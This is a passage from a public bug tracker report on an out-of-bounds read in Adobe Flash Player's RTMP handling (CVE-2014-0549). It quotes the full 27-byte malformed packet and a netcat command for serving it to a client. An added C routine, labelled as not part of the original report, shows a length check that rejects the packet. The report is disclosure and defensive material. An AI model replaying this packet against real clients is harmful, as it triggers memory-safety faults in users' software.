Status: Fixed
Closed: Sep 2014
Flash out-of-bounds read with large string length in RTMP packet
Reported by cevans@google.com, Jul 28 2014
A SWF to reproduce is attached, along with the source. The SWF simply attempts a connection to rtmp://localhost/

The "bad" RTMP packet is attached. To replay it, use something like this (Linux command line) on the localhost machine:

nc -l 1935 < badstringread.rtmp

The packet is pretty small so here it is in its entirety:

01 03 00 00 00 00 00 0E 14 00 00 00 00 01 00 0C 7F FF FF FE 41 42 43 44 45 46 47
 
Attachments:
badstringread.rtmp (27 bytes)
RTMPLocal.as (2.0 KB)
RTMPLocal.swf (1.2 KB)
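A length check that rejects this packet, as an added example that is not part of the original report and is not Adobe's fix. It assumes byte 15 of the quoted packet (0x0C) is an AMF0 long-string marker followed by a 32-bit big-endian length (7F FF FF FE) and then the 7 bytes "ABCDEFG"; the function and constant names are hypothetical.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

#define AMF0_LONG_STRING 0x0C   /* AMF0 long-string type marker */

enum amf0_status { AMF0_OK = 0, AMF0_BAD_MARKER = -1, AMF0_TRUNCATED = -2 };

/* The 27 bytes quoted in the report. */
static const uint8_t report_packet[27] = {
    0x01, 0x03, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0E, 0x14, 0x00, 0x00, 0x00,
    0x00, 0x01, 0x00, 0x0C, 0x7F, 0xFF, 0xFF, 0xFE, 0x41, 0x42, 0x43, 0x44,
    0x45, 0x46, 0x47
};
/* Assumption: the long-string marker sits at this offset in the packet. */
#define REPORT_STRING_OFFSET 15

/* Constructed well-formed value: marker, length 3, "ABC". */
static const uint8_t good_value[8] = { 0x0C, 0x00, 0x00, 0x00, 0x03, 0x41, 0x42, 0x43 };

/* Decode a long string at buf[off]; on success *str points into buf. */
enum amf0_status amf0_read_long_string(const uint8_t *buf, size_t buf_len, size_t off,
                                       const uint8_t **str, uint32_t *str_len)
{
    /* Need the marker plus 4 length bytes; compare against the remaining
       space so the arithmetic cannot wrap. */
    if (off > buf_len || buf_len - off < 5)
        return AMF0_TRUNCATED;
    if (buf[off] != AMF0_LONG_STRING)
        return AMF0_BAD_MARKER;

    uint32_t declared = ((uint32_t)buf[off + 1] << 24) | ((uint32_t)buf[off + 2] << 16) |
                        ((uint32_t)buf[off + 3] << 8)  |  (uint32_t)buf[off + 4];
    size_t remaining = buf_len - off - 5;

    /* The declared length comes from the sender and must not exceed the
       bytes actually received. */
    if (declared > remaining)
        return AMF0_TRUNCATED;

    *str = buf + off + 5;
    *str_len = declared;
    return AMF0_OK;
}

int main(void)
{
    const uint8_t *s; uint32_t n;
    printf("report packet: %d\n", amf0_read_long_string(report_packet, sizeof report_packet, REPORT_STRING_OFFSET, &s, &n));
    printf("good value:    %d\n", amf0_read_long_string(good_value, sizeof good_value, 0, &s, &n));
    return 0;
}
```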
Comment 1 by cevans@google.com, Jul 28 2014
Labels: Id-2933
Comment 2 by cevans@google.com, Sep 5 2014
Labels: CVE-2014-0549
Comment 3 by cevans@google.com, Sep 9 2014
Labels: Fixed-2014-Sep-9
Status: Fixed
http://helpx.adobe.com/security/products/flash-player/apsb14-21.html

Will derestrict in a week or so, etc.
Comment 4 by cevans@google.com, Sep 23 2014
Labels: -Restrict-View-Commit
Making public.